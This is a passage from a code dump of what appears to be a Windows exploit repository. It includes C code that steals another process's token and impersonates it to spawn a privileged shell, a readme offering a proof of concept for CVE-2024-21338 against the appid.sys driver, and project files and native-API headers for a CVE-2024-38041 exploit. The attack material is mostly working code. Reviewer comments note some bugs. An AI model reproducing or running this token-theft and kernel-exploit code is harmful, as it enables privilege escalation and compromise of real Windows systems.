            return -2;
        }
        wprintf(L"[+] Stealing token from process #%lld.\r\n", dwPid);
        stealToken(&duplicatedTokenHandle, dwPid);
        if (!duplicatedTokenHandle)
        {
            wprintf(L"Token stealing failed.\r\n");
            return -3;
        }
        spawnShell(duplicatedTokenHandle, dwPid2);
    }

    return 0;
}
217 |
/*
 * Duplicate the primary token of process dwPid as an impersonation token,
 * enable SeAssignPrimaryTokenPrivilege on the copy, impersonate it on the
 * current thread and hand the handle back through duplicateTokenHandleOut.
 *
 * NOTE(review): CHECK_STATUS (Common.h) only logs a failing status; it never
 * returns or aborts. A failed NtOpenProcess or NtOpenProcessToken is therefore
 * followed by further calls on NULL handles, and the caller learns of failure
 * only because the output handle stays NULL.
 */
void stealToken(HANDLE* duplicateTokenHandleOut, int64_t dwPid)
{
    HANDLE targetProcessHandle = NULL;
    HANDLE duplicatedTokenHandle = NULL;
    HANDLE currentTokenHandle = NULL;
    NTSTATUS Status;
    TOKEN_PRIVILEGES tp;

    // NOTE(review): "¤tTokenHandle" is a rendering artifact of "&currentTokenHandle"
    // (the "&curren" prefix was decoded as an HTML entity); the source reads &currentTokenHandle.
    Status = NtOpenProcessToken(currentProcessHandle, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, ¤tTokenHandle);
    CHECK_STATUS(L"NtOpenProcessToken() returned ", Status);

    // Enable SeDebugPrivilege (LUID value from Common.h) on our own token.
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid.HighPart = 0;
    tp.Privileges[0].Luid.LowPart = LUID_SE_DEBUG;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    Status = NtAdjustPrivilegesToken(currentTokenHandle, FALSE, &tp, sizeof(tp), NULL, NULL);
    // STATUS_NOT_ALL_ASSIGNED (privilege not held) is tolerated, not logged.
    if(Status != STATUS_NOT_ALL_ASSIGNED)
        CHECK_STATUS(L"NtAdjustPrivilegesToken() #1 returned ", Status);

    // Enable SeImpersonatePrivilege on our own token.
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid.HighPart = 0;
    tp.Privileges[0].Luid.LowPart = LUID_SE_IMPERSONATE;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    Status = NtAdjustPrivilegesToken(currentTokenHandle, FALSE, &tp, sizeof(tp), NULL, NULL);
    if (Status != STATUS_NOT_ALL_ASSIGNED)
        CHECK_STATUS(L"NtAdjustPrivilegesToken() #2 returned ", Status);

    DWORD dwDesiredAccess;
    OBJECT_ATTRIBUTES Obja;
    CLIENT_ID ClientId;

    dwDesiredAccess = PROCESS_QUERY_INFORMATION;
    ClientId.UniqueThread = NULL;
    ClientId.UniqueProcess = (HANDLE)(dwPid);
    InitializeObjectAttributes(&Obja, NULL, 0, NULL, NULL, NULL);

    Status = NtOpenProcess(&targetProcessHandle, dwDesiredAccess, &Obja, &ClientId); // Cannot access PPL processes
    CHECK_STATUS(L"NtOpenProcess() returned ", Status);

    HANDLE targetTokenHandle = NULL;

    Status = NtOpenProcessToken(
        targetProcessHandle,
        TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY,
        &targetTokenHandle);
    CHECK_STATUS(L"NtOpenProcessToken() returned ", Status);

    OBJECT_ATTRIBUTES Obja2;
    SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService;

    // Impersonation-level copy so the thread can run under it.
    SecurityQualityOfService.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
    SecurityQualityOfService.ImpersonationLevel = SecurityImpersonation;
    SecurityQualityOfService.ContextTrackingMode = FALSE;
    SecurityQualityOfService.EffectiveOnly = FALSE;
    InitializeObjectAttributes(&Obja2, NULL, 0, NULL, NULL, &SecurityQualityOfService);

    Status = NtDuplicateToken(
        targetTokenHandle,
        MAXIMUM_ALLOWED,
        &Obja2,
        FALSE,
        TokenImpersonation,
        &duplicatedTokenHandle);
    CHECK_STATUS(L"NtDuplicateToken() returned ", Status);

    // Enable SeAssignPrimaryTokenPrivilege on the duplicate (needed by CreateProcessAsUserW).
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid.HighPart = 0;
    tp.Privileges[0].Luid.LowPart = LUID_SE_ASSIGNPRIMARYTOKEN;
    tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    Status = NtAdjustPrivilegesToken(duplicatedTokenHandle, FALSE, &tp, sizeof(tp), NULL, NULL);
    if(Status != STATUS_NOT_ALL_ASSIGNED)
        CHECK_STATUS(L"NtAdjustPrivilegesToken() #1 returned ", Status); // NOTE(review): label says #1 again; this is the third call

    // Make the current thread impersonate the duplicated token.
    Status = NtSetInformationThread(
        currentThreadHandle,
        ThreadImpersonationToken,
        (PVOID)&duplicatedTokenHandle,
        sizeof(duplicatedTokenHandle));
    CHECK_STATUS(L"NtSetInformationThread() returned ", Status);

    // NOTE(review): targetProcessHandle, targetTokenHandle and currentTokenHandle are never closed.
    *duplicateTokenHandleOut = duplicatedTokenHandle;
}
--------------------------------------------------------------------------------
/Windows/CVE-2024-21338/readme.md:
--------------------------------------------------------------------------------
1 | # PoC For CVE-2024-21338
2 | This exploit targets the appid.sys driver and works on both Windows 10 and 11 with HVCI enabled.
3 |
4 | 
5 |
6 | # Credits
7 | Amazing blog post by [Avast](https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/)
8 |
--------------------------------------------------------------------------------
/Windows/CVE-2024-38041/CVE-2024-38041.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.8.34330.188
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2024-38041", "CVE-2024-38041.vcxproj", "{E0658208-2CB1-4494-B0CF-D45292BCABDF}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {E0658208-2CB1-4494-B0CF-D45292BCABDF}.Debug|x64.ActiveCfg = Debug|x64
17 | {E0658208-2CB1-4494-B0CF-D45292BCABDF}.Debug|x64.Build.0 = Debug|x64
18 | {E0658208-2CB1-4494-B0CF-D45292BCABDF}.Debug|x86.ActiveCfg = Debug|Win32
19 | {E0658208-2CB1-4494-B0CF-D45292BCABDF}.Debug|x86.Build.0 = Debug|Win32
20 | {E0658208-2CB1-4494-B0CF-D45292BCABDF}.Release|x64.ActiveCfg = Release|x64
21 | {E0658208-2CB1-4494-B0CF-D45292BCABDF}.Release|x64.Build.0 = Release|x64
22 | {E0658208-2CB1-4494-B0CF-D45292BCABDF}.Release|x86.ActiveCfg = Release|Win32
23 | {E0658208-2CB1-4494-B0CF-D45292BCABDF}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {8963674B-1FF7-4286-8BFA-C77F21BFC144}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/Windows/CVE-2024-38041/CVE-2024-38041.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 17.0
23 | Win32Proj
24 | {e0658208-2cb1-4494-b0cf-d45292bcabdf}
25 | CVE202438041
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v143
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v143
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v143
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v143
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | Level3
76 | true
77 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
78 | true
79 |
80 |
81 | Console
82 | true
83 |
84 |
85 |
86 |
87 | Level3
88 | true
89 | true
90 | true
91 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 | true
98 | true
99 |
100 |
101 |
102 |
103 | Level3
104 | true
105 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 |
108 |
109 | Console
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | true
118 | true
119 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 | MultiThreaded
122 |
123 |
124 | Console
125 | true
126 | true
127 | true
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
--------------------------------------------------------------------------------
/Windows/CVE-2024-38041/CVE-2024-38041.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 |
--------------------------------------------------------------------------------
/Windows/CVE-2024-38041/CVE-2024-38041.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/Windows/CVE-2024-38041/Common.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 |
/* Implemented in exploit.c; returns 0 on success and non-zero on failure. */
int exploit();

// https://github.com/gtworek/PSBits/blob/e233709faa16a974d3af606c2dafe37ffe8f7aa9/Misc/TokenStealWithSyscalls.c
/* Well-known privilege LUID LowPart values, used directly in
 * TOKEN_PRIVILEGES so no LookupPrivilegeValue call is needed. */
#define LUID_SE_ASSIGNPRIMARYTOKEN 3
#define LUID_SE_DEBUG 20
#define LUID_SE_IMPERSONATE 29
/* 262 == 0x106: NtAdjustPrivilegesToken could not enable every requested privilege. */
#define STATUS_NOT_ALL_ASSIGNED 262

/* Log a non-zero status together with the source line. This only prints; it
 * does not return or abort, so callers continue after a failure.
 * NOTE(review): %lu is paired with a signed NTSTATUS, and ERROR_SUCCESS (a
 * Win32 error code) is compared against an NTSTATUS; both are 0 so it works,
 * but STATUS_SUCCESS would be the matching constant. */
#define CHECK_STATUS(Msg, Status) if (ERROR_SUCCESS != (Status)) {wprintf(L"LINE %d: %s%lu\r\n", __LINE__, (Msg), (Status));}

/* Device control code; presumably what exploit() sends — confirm against exploit.c. */
#define IOCTL 0x22A014
16 |
/* Six consecutive 8-byte fields (48 bytes). Their meaning is not visible in
 * this header; presumably the output buffer shape expected by the IOCTL above —
 * confirm against exploit.c. */
typedef struct _BufferOut {
    unsigned long long field0;
    unsigned long long field1;
    unsigned long long field2;
    unsigned long long field3;
    unsigned long long field4;
    unsigned long long field5;
} BufferOut;
25 |
/* NTSTATUS and NtCreateFile constants normally provided by ntstatus.h / the
 * DDK headers, defined locally so only windows.h is needed. */
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define OBJ_CASE_INSENSITIVE 0x00000040L
#define FILE_OPEN 0x00000001

/* Local copy of the DDK InitializeObjectAttributes macro.
 * NOTE(review): it expands to a bare brace block rather than do { ... } while (0),
 * so `if (x) InitializeObjectAttributes(...); else ...` would not compile. Fine
 * for the statement-level uses in this project. */
#define InitializeObjectAttributes( p, n, a, r, s, t ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \
(p)->Attributes = a; \
(p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = t; \
}
39 |
/* Only the single THREADINFOCLASS member this project passes to
 * NtSetInformationThread; the real enum has many more entries. */
typedef enum _THREADINFOCLASS
{
    ThreadImpersonationToken = 5 //Rust docs say so
} THREADINFOCLASS;
44 |
/* Information classes for NtQuerySystemInformation, as commonly published for
 * the undocumented ntdll interface. The structs further down in this header
 * pair with SystemModuleInformation (11) and SystemHandleInformation (16);
 * which classes exploit.c actually queries is not visible here. */
typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemBasicInformation = 0,
    SystemProcessorInformation = 1,
    SystemPerformanceInformation = 2,
    SystemTimeOfDayInformation = 3,
    SystemPathInformation = 4,
    SystemProcessInformation = 5,
    SystemCallCountInformation = 6,
    SystemDeviceInformation = 7,
    SystemProcessorPerformanceInformation = 8,
    SystemFlagsInformation = 9,
    SystemCallTimeInformation = 10,
    SystemModuleInformation = 11,
    SystemLocksInformation = 12,
    SystemStackTraceInformation = 13,
    SystemPagedPoolInformation = 14,
    SystemNonPagedPoolInformation = 15,
    SystemHandleInformation = 16,
    SystemObjectInformation = 17,
    SystemPageFileInformation = 18,
    SystemVdmInstemulInformation = 19,
    SystemVdmBopInformation = 20,
    SystemFileCacheInformation = 21,
    SystemPoolTagInformation = 22,
    SystemInterruptInformation = 23,
    SystemDpcBehaviorInformation = 24,
    SystemFullMemoryInformation = 25,
    SystemLoadGdiDriverInformation = 26,
    SystemUnloadGdiDriverInformation = 27,
    SystemTimeAdjustmentInformation = 28,
    SystemSummaryMemoryInformation = 29,
    SystemMirrorMemoryInformation = 30,
    SystemPerformanceTraceInformation = 31,
    SystemObsolete0 = 32,
    SystemExceptionInformation = 33,
    SystemCrashDumpStateInformation = 34,
    SystemKernelDebuggerInformation = 35,
    SystemContextSwitchInformation = 36,
    SystemRegistryQuotaInformation = 37,
    SystemExtendServiceTableInformation = 38,
    SystemPrioritySeperation = 39,
    SystemVerifierAddDriverInformation = 40,
    SystemVerifierRemoveDriverInformation = 41,
    SystemProcessorIdleInformation = 42,
    SystemLegacyDriverInformation = 43,
    SystemCurrentTimeZoneInformation = 44,
    SystemLookasideInformation = 45,
    SystemTimeSlipNotification = 46,
    SystemSessionCreate = 47,
    SystemSessionDetach = 48,
    SystemSessionInformation = 49,
    SystemRangeStartInformation = 50,
    SystemVerifierInformation = 51,
    SystemVerifierThunkExtend = 52,
    SystemSessionProcessInformation = 53,
    SystemLoadGdiDriverInSystemSpace = 54,
    SystemNumaProcessorMap = 55,
    SystemPrefetcherInformation = 56,
    SystemExtendedProcessInformation = 57,
    SystemRecommendedSharedDataAlignment = 58,
    SystemComPlusPackage = 59,
    SystemNumaAvailableMemory = 60,
    SystemProcessorPowerInformation = 61,
    SystemEmulationBasicInformation = 62,
    SystemEmulationProcessorInformation = 63,
    SystemExtendedHandleInformation = 64,
    SystemLostDelayedWriteInformation = 65,
    SystemBigPoolInformation = 66,
    SystemSessionPoolTagInformation = 67,
    SystemSessionMappedViewInformation = 68,
    SystemHotpatchInformation = 69,
    SystemObjectSecurityMode = 70,
    SystemWatchdogTimerHandler = 71,
    SystemWatchdogTimerInformation = 72,
    SystemLogicalProcessorInformation = 73,
    SystemWow64SharedInformationObsolete = 74,
    SystemRegisterFirmwareTableInformationHandler = 75,
    SystemFirmwareTableInformation = 76,
    SystemModuleInformationEx = 77,
    SystemVerifierTriageInformation = 78,
    SystemSuperfetchInformation = 79,
    SystemMemoryListInformation = 80,
    SystemFileCacheInformationEx = 81,
    SystemThreadPriorityClientIdInformation = 82,
    SystemProcessorIdleCycleTimeInformation = 83,
    SystemVerifierCancellationInformation = 84,
    SystemProcessorPowerInformationEx = 85,
    SystemRefTraceInformation = 86,
    SystemSpecialPoolInformation = 87,
    SystemProcessIdInformation = 88,
    SystemErrorPortInformation = 89,
    SystemBootEnvironmentInformation = 90,
    SystemHypervisorInformation = 91,
    SystemVerifierInformationEx = 92,
    SystemTimeZoneInformation = 93,
    SystemImageFileExecutionOptionsInformation = 94,
    SystemCoverageInformation = 95,
    SystemPrefetchPatchInformation = 96,
    SystemVerifierFaultsInformation = 97,
    SystemSystemPartitionInformation = 98,
    SystemSystemDiskInformation = 99,
    SystemProcessorPerformanceDistribution = 100,
    SystemNumaProximityNodeInformation = 101,
    SystemDynamicTimeZoneInformation = 102,
    SystemCodeIntegrityInformation = 103,
    SystemProcessorMicrocodeUpdateInformation = 104,
    SystemProcessorBrandString = 105,
    SystemVirtualAddressInformation = 106,
    SystemLogicalProcessorAndGroupInformation = 107,
    SystemProcessorCycleTimeInformation = 108,
    SystemStoreInformation = 109,
    SystemRegistryAppendString = 110,
    SystemAitSamplingValue = 111,
    SystemVhdBootInformation = 112,
    SystemCpuQuotaInformation = 113,
    SystemNativeBasicInformation = 114,
    SystemErrorPortTimeouts = 115,
    SystemLowPriorityIoInformation = 116,
    SystemBootEntropyInformation = 117,
    SystemVerifierCountersInformation = 118,
    SystemPagedPoolInformationEx = 119,
    SystemSystemPtesInformationEx = 120,
    SystemNodeDistanceInformation = 121,
    SystemAcpiAuditInformation = 122,
    SystemBasicPerformanceInformation = 123,
    SystemQueryPerformanceCounterInformation = 124,
    SystemSessionBigPoolInformation = 125,
    SystemBootGraphicsInformation = 126,
    SystemScrubPhysicalMemoryInformation = 127,
    SystemBadPageInformation = 128,
    SystemProcessorProfileControlArea = 129,
    SystemCombinePhysicalMemoryInformation = 130,
    SystemEntropyInterruptTimingInformation = 131,
    SystemConsoleInformation = 132,
    SystemPlatformBinaryInformation = 133,
    SystemPolicyInformation = 134,
    SystemHypervisorProcessorCountInformation = 135,
    SystemDeviceDataInformation = 136,
    SystemDeviceDataEnumerationInformation = 137,
    SystemMemoryTopologyInformation = 138,
    SystemMemoryChannelInformation = 139,
    SystemBootLogoInformation = 140,
    SystemProcessorPerformanceInformationEx = 141,
    SystemCriticalProcessErrorLogInformation = 142,
    SystemSecureBootPolicyInformation = 143,
    SystemPageFileInformationEx = 144,
    SystemSecureBootInformation = 145,
    SystemEntropyInterruptTimingRawInformation = 146,
    SystemPortableWorkspaceEfiLauncherInformation = 147,
    SystemFullProcessInformation = 148,
    SystemKernelDebuggerInformationEx = 149,
    SystemBootMetadataInformation = 150,
    SystemSoftRebootInformation = 151,
    SystemElamCertificateInformation = 152,
    SystemOfflineDumpConfigInformation = 153,
    SystemProcessorFeaturesInformation = 154,
    SystemRegistryReconciliationInformation = 155,
    SystemEdidInformation = 156,
    SystemManufacturingInformation = 157,
    SystemEnergyEstimationConfigInformation = 158,
    SystemHypervisorDetailInformation = 159,
    SystemProcessorCycleStatsInformation = 160,
    SystemVmGenerationCountInformation = 161,
    SystemTrustedPlatformModuleInformation = 162,
    SystemKernelDebuggerFlags = 163,
    SystemCodeIntegrityPolicyInformation = 164,
    SystemIsolatedUserModeInformation = 165,
    SystemHardwareSecurityTestInterfaceResultsInformation = 166,
    SystemSingleModuleInformation = 167,
    SystemAllowedCpuSetsInformation = 168,
    SystemVsmProtectionInformation = 169,
    SystemInterruptCpuSetsInformation = 170,
    SystemSecureBootPolicyFullInformation = 171,
    SystemCodeIntegrityPolicyFullInformation = 172,
    SystemAffinitizedInterruptProcessorInformation = 173,
    SystemRootSiloInformation = 174,
    SystemCpuSetInformation = 175,
    SystemCpuSetTagInformation = 176,
    SystemWin32WerStartCallout = 177,
    SystemSecureKernelProfileInformation = 178,
    SystemCodeIntegrityPlatformManifestInformation = 179,
    SystemInterruptSteeringInformation = 180,
    SystemSupportedProcessorArchitectures = 181,
    SystemMemoryUsageInformation = 182,
    SystemCodeIntegrityCertificateInformation = 183,
    SystemPhysicalMemoryInformation = 184,
    SystemControlFlowTransition = 185,
    SystemKernelDebuggingAllowed = 186,
    SystemActivityModerationExeState = 187,
    SystemActivityModerationUserSettings = 188,
    SystemCodeIntegrityPoliciesFullInformation = 189,
    SystemCodeIntegrityUnlockInformation = 190,
    SystemIntegrityQuotaInformation = 191,
    SystemFlushInformation = 192,
    SystemProcessorIdleMaskInformation = 193,
    SystemSecureDumpEncryptionInformation = 194,
    SystemWriteConstraintInformation = 195,
    SystemKernelVaShadowInformation = 196,
    SystemHypervisorSharedPageInformation = 197,
    SystemFirmwareBootPerformanceInformation = 198,
    SystemCodeIntegrityVerificationInformation = 199,
    SystemFirmwarePartitionInformation = 200,
    SystemSpeculationControlInformation = 201,
    SystemDmaGuardPolicyInformation = 202,
    SystemEnclaveLaunchControlInformation = 203,
    SystemWorkloadAllowedCpuSetsInformation = 204,
    SystemCodeIntegrityUnlockModeInformation = 205,
    SystemLeapSecondInformation = 206,
    SystemFlags2Information = 207,
    SystemSecurityModelInformation = 208,
    SystemCodeIntegritySyntheticCacheInformation = 209,
    SystemFeatureConfigurationInformation = 210,
    SystemFeatureConfigurationSectionInformation = 211,
    SystemFeatureUsageSubscriptionInformation = 212,
    SystemSecureSpeculationControlInformation = 213,
    SystemSpacesBootInformation = 214,
    SystemFwRamdiskInformation = 215,
    SystemWheaIpmiHardwareInformation = 216,
    SystemDifSetRuleClassInformation = 217,
    SystemDifClearRuleClassInformation = 218,
    SystemDifApplyPluginVerificationOnDriver = 219,
    SystemDifRemovePluginVerificationOnDriver = 220,
    SystemShadowStackInformation = 221,
    SystemBuildVersionInformation = 222,
    SystemPoolLimitInformation = 223,
    SystemCodeIntegrityAddDynamicStore = 224,
    SystemCodeIntegrityClearDynamicStores = 225,
    SystemDifPoolTrackingInformation = 226,
    SystemPoolZeroingInformation = 227,
    SystemDpcWatchdogInformation = 228,
    SystemDpcWatchdogInformation2 = 229,
    SystemSupportedProcessorArchitectures2 = 230,
    SystemSingleProcessorRelationshipInformation = 231,
    SystemXfgCheckFailureInformation = 232,
    SystemIommuStateInformation = 233,
    SystemHypervisorMinrootInformation = 234,
    SystemHypervisorBootPagesInformation = 235,
    SystemPointerAuthInformation = 236,
    SystemSecureKernelDebuggerInformation = 237,
    SystemOriginalImageFeatureInformation = 238,
    MaxSystemInfoClass = 239
} SYSTEM_INFORMATION_CLASS;
287 |
/*
 * One entry of the array returned for SystemHandleInformation (class 16
 * in the SYSTEM_INFORMATION_CLASS enum above).
 *
 * The field layout is the project's own transcription of an undocumented
 * ntdll structure; only the widths written here are asserted. The trailing
 * __PADDING__ member uses a reserved identifier (double leading underscore),
 * harmless in practice but a name the implementation is allowed to claim.
 */
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
    unsigned short UniqueProcessId;        // presumably the owning PID, 16-bit in this layout
    unsigned short CreatorBackTraceIndex;
    unsigned char ObjectTypeIndex;
    unsigned char HandleAttributes;
    unsigned short HandleValue;
    void* Object;                          // object pointer as reported by the kernel
    unsigned long GrantedAccess;
    long __PADDING__[1];
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;

/*
 * Header of the SystemHandleInformation result.
 * Handles[1] is the pre-C99 "struct hack": the real array holds
 * NumberOfHandles entries, so the buffer must be sized from the
 * ReturnLength reported by NtQuerySystemInformation, never from
 * sizeof(SYSTEM_HANDLE_INFORMATION).
 */
typedef struct _SYSTEM_HANDLE_INFORMATION
{
    ULONG NumberOfHandles;
    struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
305 |
/*
 * One loaded-module record as returned for SystemModuleInformation
 * (class 11 in the SYSTEM_INFORMATION_CLASS enum above).
 *
 * Reserved3 exists only in 64-bit builds, which keeps ImageBaseAddress
 * pointer-aligned. NameOffset is presumably the offset of the file-name
 * component inside Name; Name is a narrow (CHAR) path buffer.
 */
typedef struct SYSTEM_MODULE {
    ULONG Reserved1;
    ULONG Reserved2;
#ifdef _WIN64
    ULONG Reserved3;
#endif
    PVOID ImageBaseAddress;   // kernel-mode load address of the module
    ULONG ImageSize;
    ULONG Flags;
    WORD Id;
    WORD Rank;
    WORD w018;                // unnamed in the original layout; meaning unknown here
    WORD NameOffset;
    CHAR Name[255];
}SYSTEM_MODULE, * PSYSTEM_MODULE;

/*
 * Header of the SystemModuleInformation result; Modules[1] is the same
 * "struct hack" as SYSTEM_HANDLE_INFORMATION — ModulesCount entries follow.
 */
typedef struct SYSTEM_MODULE_INFORMATION {
    ULONG ModulesCount;
    SYSTEM_MODULE Modules[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
326 |
/*
 * Counted wide string used by the native API. Per the NT convention both
 * lengths are in bytes and Buffer need not be NUL-terminated; code that
 * prints Buffer with %ws (see exploit.c) relies on RtlInitUnicodeString
 * having been given a NUL-terminated literal.
 */
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

/*
 * Object-name/attribute block passed to NtCreateFile, NtOpenProcess and
 * NtDuplicateToken. Length must be sizeof(OBJECT_ATTRIBUTES); the
 * InitializeObjectAttributes macro (Common.h, not shown) fills it.
 */
typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

/*
 * Completion status of an I/O request. The anonymous union (C11 / MSVC
 * extension) overlays the NTSTATUS with a pointer-sized slot.
 */
typedef struct _IO_STATUS_BLOCK
{
    union
    {
        NTSTATUS Status;
        PVOID Pointer;
    };
    ULONG_PTR Information;
} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;

/*
 * Process/thread identifier pair for NtOpenProcess. main.c stores the
 * numeric PID cast to HANDLE in UniqueProcess and NULL in UniqueThread.
 */
typedef struct _CLIENT_ID
{
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID, * PCLIENT_ID;
358 |
/*
 * APC completion callback type for NtDeviceIoControlFile. This project
 * always passes NULL for it (see SendRequest in exploit.c), so the typedef
 * exists only to spell the prototype.
 */
typedef
VOID
(NTAPI* PIO_APC_ROUTINE) (
    IN PVOID ApcContext,
    IN PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG Reserved
    );
366 |
/*
 * Function-pointer types for the ntdll exports that main.c resolves with
 * GetProcAddress. The SAL spelling is mixed across this group (_In_ style
 * on some, legacy __in/__out_opt on pNtQuerySystemInformation, none on the
 * token/process calls); that is cosmetic, the annotations expand to nothing
 * in a plain C build.
 */
typedef NTSTATUS(NTAPI* pNtOpenProcessToken)(HANDLE ProcessHandle, ACCESS_MASK DesiredAccess, PHANDLE TokenHandle);
typedef NTSTATUS(NTAPI* pNtAdjustPrivilegesToken)(HANDLE TokenHandle, BOOLEAN DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, ULONG BufferLength, PTOKEN_PRIVILEGES PreviousState, PULONG ReturnLength);
typedef NTSTATUS(NTAPI* pNtOpenProcess)(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId);
typedef NTSTATUS(NTAPI* pNtDuplicateToken)(HANDLE ExistingTokenHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, BOOLEAN EffectiveOnly, TOKEN_TYPE TokenType, PHANDLE NewTokenHandle);
typedef NTSTATUS(NTAPI* pNtSetInformationThread)(HANDLE ThreadHandle, THREADINFOCLASS ThreadInformationClass, PVOID ThreadInformation, ULONG ThreadInformationLength);
typedef NTSTATUS(NTAPI* pNtQueryInformationToken)(HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, PVOID TokenInformation, ULONG TokenInformationLength, PULONG ReturnLength);
typedef NTSTATUS(NTAPI* pNtClose)(HANDLE Handle);

typedef NTSTATUS(NTAPI* pRtlGetVersion)(LPOSVERSIONINFOEXW lpVersionInformation);

typedef NTSTATUS(NTAPI* pNtDeviceIoControlFile)(
    _In_ HANDLE FileHandle,
    _In_opt_ HANDLE Event,
    _In_opt_ PIO_APC_ROUTINE ApcRoutine,
    _In_opt_ PVOID ApcContext,
    _Out_ PIO_STATUS_BLOCK IoStatusBlock,
    _In_ ULONG IoControlCode,
    _In_reads_bytes_opt_(InputBufferLength) PVOID InputBuffer,
    _In_ ULONG InputBufferLength,
    _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,
    _In_ ULONG OutputBufferLength
    );

/*
 * NOTE(review): the documented NtWriteVirtualMemory prototype uses SIZE_T
 * for NumberOfBytesToWrite and PSIZE_T for NumberOfBytesWritten. With
 * PULONG here, a 64-bit build that passes a ULONG out-variable would have
 * 8 bytes written into a 4-byte object — confirm before using this pointer
 * (it is resolved in main.c but not called in the visible files).
 */
typedef NTSTATUS(NTAPI* pNtWriteVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID BaseAddress,
    PVOID Buffer,
    ULONG NumberOfBytesToWrite,
    PULONG NumberOfBytesWritten
    );

typedef NTSTATUS(NTAPI* pNtCreateFile)(
    _Out_ PHANDLE FileHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
